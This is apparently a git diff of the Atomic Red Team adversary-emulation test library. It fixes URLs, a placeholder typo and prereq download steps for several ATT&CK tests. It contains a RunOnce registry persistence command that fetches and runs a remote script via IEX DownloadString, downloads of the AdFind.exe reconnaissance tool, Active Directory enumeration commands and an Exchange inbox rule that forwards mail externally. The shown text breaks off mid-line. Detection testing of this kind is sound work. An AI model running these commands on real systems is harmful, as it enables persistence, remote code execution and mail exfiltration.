diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6176a5da..dbb52371 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -37161,7 +37161,7 @@ privilege-escalation: executor: command: | $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore @@ -37211,7 +37211,8 @@ privilege-escalation: - name: Suspicious bat file run from startup Folder auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e description: | - bat files can be placed in and executed from the startup folder to maintain persistance. + bat files can be placed in and executed from the startup folder to maintain persistance + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. supported_platforms: @@ -60101,7 +60102,7 @@ persistence: executor: command: | $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore @@ -60151,7 +60152,8 @@ persistence: - name: Suspicious bat file run from startup Folder auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e description: | - bat files can be placed in and executed from the startup folder to maintain persistance. + bat files can be placed in and executed from the startup folder to maintain persistance + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. supported_platforms: @@ -70043,7 +70045,7 @@ collection: $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd Connect-ExchangeOnline -Credential $creds - New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}" + New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}" cleanup_command: | $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd @@ -84801,10 +84803,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -84830,10 +84831,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt @@ -84857,10 +84857,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -84884,10 +84883,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -85729,6 +85727,7 @@ discovery: ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=group)\n" @@ -87951,10 +87950,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -88244,10 +88242,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -88271,10 +88268,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -90527,10 +90523,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -90554,10 +90549,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml index aa723965..a01415cd 100644 --- a/atomics/Indexes/office-365-index.yaml +++ b/atomics/Indexes/office-365-index.yaml @@ -42069,7 +42069,7 @@ collection: $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd Connect-ExchangeOnline -Credential $creds - New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}" + New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}" cleanup_command: | $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 0e082255..f6b794ec 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -33011,7 +33011,7 @@ privilege-escalation: executor: command: | $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore @@ -33061,7 +33061,8 @@ privilege-escalation: - name: Suspicious bat file run from startup Folder auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e description: | - bat files can be placed in and executed from the startup folder to maintain persistance. + bat files can be placed in and executed from the startup folder to maintain persistance + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. supported_platforms: @@ -53421,7 +53422,7 @@ persistence: executor: command: | $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore @@ -53471,7 +53472,8 @@ persistence: - name: Suspicious bat file run from startup Folder auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e description: | - bat files can be placed in and executed from the startup folder to maintain persistance. + bat files can be placed in and executed from the startup folder to maintain persistance + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. supported_platforms: @@ -74088,10 +74090,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -74117,10 +74118,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt @@ -74144,10 +74144,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -74171,10 +74170,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -74842,6 +74840,7 @@ discovery: ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=group)\n" @@ -76343,10 +76342,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -76616,10 +76614,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -76643,10 +76640,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -78428,10 +78424,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -78455,10 +78450,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - - ' + get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 914b775b..2f76311b 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -288,6 +288,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index 7487524c..78d673a6 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -149,6 +149,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 9cffa6be..3e4d9246 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -433,6 +433,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` @@ -479,6 +480,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index 37f06d8d..74f7d336 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml @@ -210,6 +210,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | @@ -234,6 +235,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 8800a1f5..7f90dc60 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -312,6 +312,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index 13d6c9ce..4f03a810 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml @@ -128,6 +128,7 @@ atomic_tests: if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 1318837c..0032056b 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -224,6 +224,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` @@ -270,6 +271,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` @@ -316,6 +318,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` @@ -362,6 +365,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index 280f34a3..fb1f6e15 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -86,6 +86,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | @@ -110,6 +111,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | @@ -134,6 +136,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | @@ -158,6 +161,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | diff --git a/atomics/T1114.003/T1114.003.md b/atomics/T1114.003/T1114.003.md index 60147357..2ea0745d 100644 --- a/atomics/T1114.003/T1114.003.md +++ b/atomics/T1114.003/T1114.003.md @@ -39,7 +39,7 @@ Creates a new Inbox Rule to forward emails to an external user via the "ForwardT $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd Connect-ExchangeOnline -Credential $creds -New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}" +New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}" ``` #### Cleanup Commands: diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml index bcfb52de..3037d5c8 100644 --- a/atomics/T1114.003/T1114.003.yaml +++ b/atomics/T1114.003/T1114.003.yaml @@ -40,7 +40,7 @@ atomic_tests: $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd Connect-ExchangeOnline -Credential $creds - New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}" + New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}" cleanup_command: | $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md index 5fafdf42..c197f376 100644 --- a/atomics/T1482/T1482.md +++ b/atomics/T1482/T1482.md @@ -187,6 +187,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` @@ -233,6 +234,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml index c45b1389..dfa4c0f5 100644 --- a/atomics/T1482/T1482.yaml +++ b/atomics/T1482/T1482.yaml @@ -81,6 +81,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | @@ -105,6 +106,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index aaaf1968..d83f24f7 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -180,7 +180,7 @@ Upon successful execution, a new entry will be added to the runonce item in the ```powershell $RunOnceKey = "#{reg_key_path}" -set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object 